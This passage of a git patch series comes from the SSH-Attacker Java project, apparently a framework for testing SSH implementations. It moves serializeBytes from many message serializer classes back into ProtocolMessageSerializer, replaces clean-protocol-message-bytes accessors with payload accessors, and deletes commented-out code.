a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java @@ -42,9 +42,4 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java index 27564084c..506c0797e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeReplyMessageSerializer.java @@ -57,9 +57,4 @@ public void serializeMessageSpecificContents() { serializeSignature(message); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java index 887c398aa..2e97f674b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeInitMessageSerializer.java @@ -60,9 +60,4 @@ public void serializeMessageSpecificContents() { LOGGER.debug("HybridKeyBytes: " + ArrayConverter.bytesToHexString(keys)); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java index dee75e7e6..899e22f70 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/HybridKeyExchangeReplyMessageSerializer.java @@ -84,10 +84,4 @@ private void serializeSignature() { LOGGER.debug("Signature: " + message.getSignature()); } - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java index 82e06eacc..8e95ea213 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/IgnoreMessageSerializer.java @@ -34,9 +34,4 @@ public void serializeMessageSpecificContents() { serializeData(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java index c6474ca83..c5cf06763 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/KeyExchangeInitMessageSerializer.java @@ -199,10 +199,4 @@ public void serializeMessageSpecificContents() { serializeReserved(); } - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java index 604541da5..769e2e03a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/NewKeysMessageSerializer.java @@ -19,10 +19,4 @@ public NewKeysMessageSerializer(NewKeysMessage message) { @Override public void serializeMessageSpecificContents() {} - @Override - protected byte[] serializeBytes() { - super.serializeProtocolMessageContents(); - // serializeMessageSpecificContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java index 8becc68c9..97fc64b7a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeDoneMessageSerializer.java @@ -34,9 +34,4 @@ public void serializeMessageSpecificContents() { serializeSignature(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java index 5a24cc1cd..3cfe277da 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangePubkeyMessageSerializer.java @@ -45,9 +45,4 @@ public void serializeMessageSpecificContents() { serializeTransientPublicKey(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java index 550468da9..6b80f7ee4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/RsaKeyExchangeSecretMessageSerializer.java @@ -37,10 +37,4 @@ private void serializeEncryptedSecret() { public void serializeMessageSpecificContents() { serializeEncryptedSecret(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java index ac97f6fa2..f6baa4cfd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceAcceptMessageSerializer.java @@ -37,10 +37,4 @@ public void serializeMessageSpecificContents() { serializeServiceName(); } - @Override - protected byte[] serializeBytes() { - // serializeMessageSpecificContents(); - super.serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java index dc42e5c3f..23814bb4f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/ServiceRequestMessageSerializer.java @@ -37,9 +37,4 @@ public void serializeMessageSpecificContents() { serializeServiceName(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java index f57b8d1a9..881ba739b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnimplementedMessageSerializer.java @@ -26,9 +26,4 @@ public void serializeMessageSpecificContents() { serializeSequenceNumber(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java index 33b84defe..d4294965d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/UnknownMessageSerializer.java @@ -27,9 +27,4 @@ public void serializeMessageSpecificContents() { appendBytes(message.getPayload().getValue()); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java index fe7047b28..966a7d3e9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/VersionExchangeMessageSerializer.java @@ -61,9 +61,4 @@ protected void serializeProtocolMessageContents() { serializeEndOfMessageSequence(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } From 6ac9b29fda5d17e091bcdc3d5a0a6db8b0983b31 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 12 Aug 2023 01:27:12 +0200 Subject: [PATCH 059/176] REV: move "serializeBytes" from messageSerializer-classes back to the ProtocolMessageSerializer-Class --- .../core/layer/hints/LayerProcessingHint.java | 6 +- .../core/layer/hints/PacketLayerHint.java | 1 - .../core/layer/impl/PacketLayer.java | 36 +++++------ .../core/layer/impl/SSH2Layer.java | 62 ------------------- .../core/packet/AbstractPacket.java | 17 ++--- .../core/packet/cipher/PacketMacedCipher.java | 4 +- .../packet/parser/BinaryPacketParser.java | 9 --- .../UserAuthBannerMessageSerializer.java | 6 -- .../UserAuthFailureMessageSerializer.java | 6 -- .../UserAuthInfoRequestMessageSerializer.java | 6 -- ...UserAuthInfoResponseMessageSerializer.java | 6 -- .../UserAuthRequestMessageSerializer.java | 6 -- .../UserAuthSuccessMessageSerializer.java | 6 -- .../common/ProtocolMessageSerializer.java | 6 +- .../serializer/ChannelMessageSerializer.java | 6 -- .../ChannelOpenMessageSerializer.java | 6 -- ...GlobalRequestFailureMessageSerializer.java | 6 -- .../GlobalRequestMessageSerializer.java | 6 -- ...GlobalRequestSuccessMessageSerializer.java | 6 -- .../serializer/AsciiMessageSerializer.java | 6 -- .../serializer/DebugMessageSerializer.java | 6 -- ...hGexKeyExchangeGroupMessageSerializer.java | 6 -- ...DhGexKeyExchangeInitMessageSerializer.java | 6 -- ...eyExchangeOldRequestMessageSerializer.java | 6 -- ...hGexKeyExchangeReplyMessageSerializer.java | 4 +- ...exKeyExchangeRequestMessageSerializer.java | 6 -- .../DhKeyExchangeInitMessageSerializer.java | 6 -- .../DhKeyExchangeReplyMessageSerializer.java | 6 -- .../DisconnectMessageSerializer.java | 6 -- .../EcdhKeyExchangeInitMessageSerializer.java | 6 -- ...EcdhKeyExchangeReplyMessageSerializer.java | 6 -- ...ybridKeyExchangeInitMessageSerializer.java | 6 -- ...bridKeyExchangeReplyMessageSerializer.java | 7 --- .../serializer/IgnoreMessageSerializer.java | 6 -- .../KeyExchangeInitMessageSerializer.java | 7 --- .../serializer/NewKeysMessageSerializer.java | 7 --- .../RsaKeyExchangeDoneMessageSerializer.java | 6 -- ...RsaKeyExchangePubkeyMessageSerializer.java | 6 -- ...RsaKeyExchangeSecretMessageSerializer.java | 6 -- .../ServiceAcceptMessageSerializer.java | 7 --- .../ServiceRequestMessageSerializer.java | 6 -- .../UnimplementedMessageSerializer.java | 6 -- .../serializer/UnknownMessageSerializer.java | 6 -- .../VersionExchangeMessageSerializer.java | 6 -- 44 files changed, 28 insertions(+), 331 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java index bca4c8c59..5f97211ea 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java @@ -11,8 +11,4 @@ * Lower layers sometimes need a hint for which data they need to receive. This a * LayerProcessingHint carries the necessary information. */ -public interface LayerProcessingHint { - - @Override - public boolean equals(Object o); -} +public interface LayerProcessingHint {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java index 05c233bac..08775b8fa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java @@ -30,7 +30,6 @@ public PacketLayerHint(MessageIdConstant type, int epoch, int sequenceNumber) { this.sequenceNumber = sequenceNumber; } - @Override public boolean equals(Object other) { if (other instanceof PacketLayerHint) { PacketLayerHint otherHint = (PacketLayerHint) other; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index f44750ecd..bd6dc55f0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -190,7 +190,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException "[bro] Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); - packet.setCleanProtocolMessageBytes(packet.getPayload()); + packet.setPayload(packet.getPayload()); addProducedContainer(packet); PacketLayerHint currentHint; @@ -209,18 +209,18 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } // currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); // if only one byte is to transmit - transmit it alone - if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { + if (packet.getPayload().getValue().length == 1) { currentInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } else { currentInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } } else { @@ -232,18 +232,18 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException nextInputStream.setHint(currentHint); } // nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { + if (packet.getPayload().getValue().length == 1) { nextInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } else { nextInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } throw new RuntimeException(); } @@ -276,15 +276,10 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) } MessageIdConstant id = - MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext()); - LOGGER.debug( - "[bro] Identifier: {} and constant {}", - packet.getCleanProtocolMessageBytes().getValue()[0], - id); + MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext()); + LOGGER.debug("[bro] Identifier: {} and constant {}", packet.getPayload().getValue()[0], id); - switch (MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())) { + switch (MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext())) { case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); return new PacketLayerHint(MessageIdConstant.SSH_MSG_DISCONNECT); @@ -477,8 +472,7 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) "[bro] cannot identifie {} as {} - returningn null", raw[1], MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], - context.getContext())); + packet.getPayload().getValue()[0], context.getContext())); return null; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index ae4f759c4..8adc79f2f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -118,17 +118,6 @@ private void processMessage( message.setCompleteResultingMessage(serializedMessage); collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - - /* if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() - || message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { - message.getHandler(context).adjustContextAfterMessageSent(message); - } else { - LOGGER.info( - "[bro] Adjusting Context while messagetype is {}", - message.getCompleteResultingMessage().getValue()[0]); - }*/ } @Override @@ -265,32 +254,6 @@ private void readUserAuthReq() { LOGGER.warn("The lower layer did not produce a data stream: ", e); return; } - - /* int length = 0; - - try { - length = inputStream.available(); - } catch (IOException e) { - throw new RuntimeException(e); - } - - - try { - LOGGER.info("remainign in Inpustream: {}", inputStream.available()); - } catch (IOException e) { - throw new RuntimeException(e); - } - - byte[] data = new byte[length]; - - try { - inputStream.read(data); - } catch (IOException e) { - throw new RuntimeException(e); - } - - HintedInputStream copied_inputstream = new HintedInputStreamAdapterStream(null, new ByteArrayInputStream(data)); */ - UserAuthUnknownMessageParser parser = new UserAuthUnknownMessageParser(inputStream); parser.parse(userAuthUnknownMessage); String methodString = userAuthUnknownMessage.getMethodName().getValue(); @@ -392,31 +355,6 @@ private void readChannelRequest() { return; } - /* int length = 0; - - try { - length = inputStream.available(); - } catch (IOException e) { - throw new RuntimeException(e); - } - - - try { - LOGGER.info("remainign in Inpustream: {}", inputStream.available()); - } catch (IOException e) { - throw new RuntimeException(e); - } - - byte[] data = new byte[length]; - - try { - inputStream.read(data); - } catch (IOException e) { - throw new RuntimeException(e); - } - - HintedInputStream copied_inputstream = new HintedInputStreamAdapterStream(null, new ByteArrayInputStream(data)); */ - ChannelRequestUnknownMessageParser parser = new ChannelRequestUnknownMessageParser(inputStream); parser.parse(channelRequestUnknownMessage); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 444274db0..34ec3553d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -39,14 +39,6 @@ public abstract class AbstractPacket> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray payload; - public ModifiableByteArray getCleanProtocolMessageBytes() { - return cleanProtocolMessageBytes; - } - - public void setCleanProtocolMessageBytes(ModifiableByteArray cleanProtocolMessageBytes) { - this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; - } - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray cleanProtocolMessageBytes; @@ -91,17 +83,18 @@ public void setCompressedPayload(byte[] compressedPayload) { ModifiableVariableFactory.safelySetValue(this.compressedPayload, compressedPayload); } + public void setPayload(byte[] payload) { + this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); + } + public ModifiableByteArray getPayload() { return payload; } public void setPayload(ModifiableByteArray payload) { + // this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; this.payload = payload; } - public void setPayload(byte[] payload) { - this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); - } - public abstract void prepareComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index 455baff13..33108333c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -326,7 +326,7 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { computations.setPlainPacketBytes(plainData); ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); plain_modifialbel.setOriginalValue(plainData); - packet.setCleanProtocolMessageBytes(plain_modifialbel); + packet.setPayload(plain_modifialbel); } else { if (encryptionAlgorithm.getIVSize() > 0) { // Case 3a: Blob packet / Cipher with IV @@ -338,7 +338,7 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { packet.setCompressedPayload(plainData); ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); plain_modifialbel.setOriginalValue(plainData); - packet.setCleanProtocolMessageBytes(plain_modifialbel); + packet.setPayload(plain_modifialbel); } // Set the IV for the next packet if the encryption algorithm incorporates one if (encryptionAlgorithm.getIVSize() > 0) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java index d2c943989..5117bb77b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/parser/BinaryPacketParser.java @@ -31,15 +31,6 @@ public class BinaryPacketParser extends AbstractPacketParser { */ private final int sequenceNumber; - /* - public BinaryPacketParser( - byte[] array, int startPosition, PacketCipher activeDecryptCipher, int sequenceNumber) { - super(array, startPosition); - this.activeDecryptCipher = activeDecryptCipher; - this.sequenceNumber = sequenceNumber; - } - */ - public BinaryPacketParser( InputStream stream, PacketCipher activeDecryptCipher, int sequenceNumber) { super(stream); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java index 790116dac..b34ed8135 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java @@ -44,10 +44,4 @@ public void serializeMessageSpecificContents() { serializeMessage(); serializeLanguageTag(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java index ad8d544cd..ef20d8b8b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java @@ -49,10 +49,4 @@ public void serializeMessageSpecificContents() { serializePossibleAuthenticationMethods(); serializePartialSuccess(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java index cfe7656ed..0a93b98f0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java @@ -75,10 +75,4 @@ public void serializeMessageSpecificContents() { serializeLanguageTag(); serializePrompt(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java index bb00335f4..eb634ba10 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java @@ -41,10 +41,4 @@ private void serializeResponse() { public void serializeMessageSpecificContents() { serializeResponse(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java index 1e41c211b..a94dc0b63 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java @@ -54,10 +54,4 @@ public void serializeMessageSpecificContents() { serializeServiceName(); serializeMethodName(); } - - @Override - public byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java index 28fc8be70..2c74846d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java @@ -18,10 +18,4 @@ public UserAuthSuccessMessageSerializer(UserAuthSuccessMessage message) { @Override public void serializeMessageSpecificContents() {} - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java index 156d9a3e1..2b984e083 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java @@ -17,11 +17,11 @@ public ProtocolMessageSerializer(T message) { this.message = message; } - /* @Override + @Override protected final byte[] serializeBytes() { serializeProtocolMessageContents(); return getAlreadySerialized(); - }*/ + } - // protected abstract void serializeProtocolMessageContents(); + protected abstract void serializeProtocolMessageContents(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java index ce87c671f..7bdec7182 100644 --- 